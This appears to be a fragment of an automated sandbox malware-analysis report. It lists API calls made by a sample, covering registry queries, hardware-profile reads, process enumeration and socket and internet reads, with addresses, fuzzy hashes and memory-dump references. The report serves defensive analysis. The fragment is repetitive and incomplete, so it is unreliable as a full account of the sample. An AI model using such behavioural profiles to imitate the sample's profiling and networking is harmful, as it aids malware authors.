                                                                                                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                                                                                                        • Opcode ID: f8b69fd56bd361c6e0d9be0422e3342bfe6943253522aecbe2f1b9df9c20fad8
                                                                                                                                                                                                                                                        • Instruction ID: 6ab03abf05825c2763c9670960140e717c20cf7866119166e870121155647a5d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8b69fd56bd361c6e0d9be0422e3342bfe6943253522aecbe2f1b9df9c20fad8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42E01A32201101AFCB14BF06EC48D867BB5EFC6747B000438F65446261C7219922DB53
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041CD89
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                                                                                                                        • Opcode ID: 962e640fd56698dff73a918a277574572567592bb71662d0de3609c0635d39d9
                                                                                                                                                                                                                                                        • Instruction ID: 06d2f6d672fbcee7aa621c698bc6ffd85c5d53ad97c3885d8ab3905aa6cdcc44
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 962e640fd56698dff73a918a277574572567592bb71662d0de3609c0635d39d9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53E01270B00207DFD704CF55CD80AAAB7BABF84605B54865CD40997219DB369D16C794
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentHwProfileA.ADVAPI32(?), ref: 0042E6BD
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProfile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2104809126-0
                                                                                                                                                                                                                                                        • Opcode ID: b2d597882cf1155557b3b3fe48912788889ab19c7d11b059bdf31d48ff07a0e0
                                                                                                                                                                                                                                                        • Instruction ID: 4283c57a7ab19923ac7e8caf67ae336aa2706f08777214b33feacf9787fe7a02
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2d597882cf1155557b3b3fe48912788889ab19c7d11b059bdf31d48ff07a0e0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1E012722013059BD314FF28ED90D9B37ADAFD6385F05852CE9418736AEA34E825DB92
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,?,?,?,?,?), ref: 0042D689
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                                                                                                        • Opcode ID: 725ddee3a005ea6ee62bb5431ebf099f3694dd74c64d863e5814e00f97f5c12a
                                                                                                                                                                                                                                                        • Instruction ID: ebf244302e688d40579662589a7d271a28f07b48063c6ba84c2407962e18c245
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 725ddee3a005ea6ee62bb5431ebf099f3694dd74c64d863e5814e00f97f5c12a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17E0ECB5215221EFD600AB48ED49C5A7F75FFCCB42B4149ACF54887231C331D825DB52
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • recv.WS2_32(?,?,00001000,00000000), ref: 0041BECE
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: recv
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1507349165-0
                                                                                                                                                                                                                                                        • Opcode ID: 7c997f596d6fae21949b8e7c5eebd4f299c4ff9f3ec787349acd6699d7193efe
                                                                                                                                                                                                                                                        • Instruction ID: fe729bae827430c567c048ec2fd2e27d1d4e0280f016dea6c10d1402d0b8ed55
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c997f596d6fae21949b8e7c5eebd4f299c4ff9f3ec787349acd6699d7193efe
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BDE01775310341DBE355DB1CCCA6F5A32EAEB88381F85042DA606DB392EEA4ED04C719
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 00418B55
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileInternetRead
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 778332206-0
                                                                                                                                                                                                                                                        • Opcode ID: 5d0f97d4f94a55d416c486535f25878534432b1ce4db7539a7afacde32765e48
                                                                                                                                                                                                                                                        • Instruction ID: 47dbd7edb0e05e2c697879e4355dd5a036132e2c0f3b779e11120cca8a421ff1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d0f97d4f94a55d416c486535f25878534432b1ce4db7539a7afacde32765e48
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15E04F717052069FEB05CF20DC89D5277AAAB85709710099CE009A7255E671ED07CF80
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006), ref: 0041BAA3
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: socket
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 98920635-0
                                                                                                                                                                                                                                                        • Opcode ID: 4f387bd5af0f20a72835e296e2c7eee7f545c5cc5420c8a99abafb74d37c8c1a
                                                                                                                                                                                                                                                        • Instruction ID: d99fea216bbd3fbe6a818429399aca5f22705c57db7d802aa728f5a21a2cdef0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f387bd5af0f20a72835e296e2c7eee7f545c5cc5420c8a99abafb74d37c8c1a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AAD05E3975062187F568CA38DCC1B597613ABC0BA5F694328E122AB7D2DAA0A812D704
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • recv.WS2_32(?,?,00001000,00000000), ref: 0041C277
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: recv
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1507349165-0
                                                                                                                                                                                                                                                        • Opcode ID: 7683341fd0684d53d29053bf40176ce8fa730a497a0121adb2484bc89292eabb
                                                                                                                                                                                                                                                        • Instruction ID: 9f2704b98f0abf395afddc410593a933132834f6a0ad3b1c83884cd4115d755d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7683341fd0684d53d29053bf40176ce8fa730a497a0121adb2484bc89292eabb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BFD05E30300641D7E718CB0DCC21F1A7AA2EBC4781F10412CA101962E6CA21EC15C648
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119), ref: 0042DC93
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Open
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                                                                                                        • Opcode ID: 5b3c7c1fc3dcf381f2c595158cb0f430b9073ba05e5b283708daae11dc9fde07
                                                                                                                                                                                                                                                        • Instruction ID: 30479591516056f62c92bab4faf70abe3892d4f6c4a57171a7258af1ba3b3cad
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b3c7c1fc3dcf381f2c595158cb0f430b9073ba05e5b283708daae11dc9fde07
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4E01271701200FFEB14AF16DC45F1037A1D78670AF10413CAA29972A3C731E822CA06
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • Process32Next.KERNEL32(?,?), ref: 0042D75D
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: NextProcess32
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1850201408-0
                                                                                                                                                                                                                                                        • Opcode ID: fe159a8f2c354bca25a05df39f8329c0891dfb9029a8f99b2d41823cd7d2bb0c
                                                                                                                                                                                                                                                        • Instruction ID: 32b47e29c8c4e4985d2e6b5119f68bad3bd8959bd8270ed07dec7e7b1d1ede82
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe159a8f2c354bca25a05df39f8329c0891dfb9029a8f99b2d41823cd7d2bb0c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48D06776315606AFC708DF24DD95D2A77A1AB48645B05056CB642C6AA2EA20DC20DB15
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: NextProcess32
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1850201408-0
                                                                                                                                                                                                                                                        • Opcode ID: bc7dd3bab864bc797ab50e6ceabc01495cfe798b5420590e61ed5bf68f20795b
                                                                                                                                                                                                                                                        • Instruction ID: 811cfe4a494676fbde390922cea192d42fa305f10380b5c27a8bab0f82a53d5f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc7dd3bab864bc797ab50e6ceabc01495cfe798b5420590e61ed5bf68f20795b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40D0C9763125029FC6089B14E86993936A4DF49251305016CE802876A1CF25D8A08A99
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
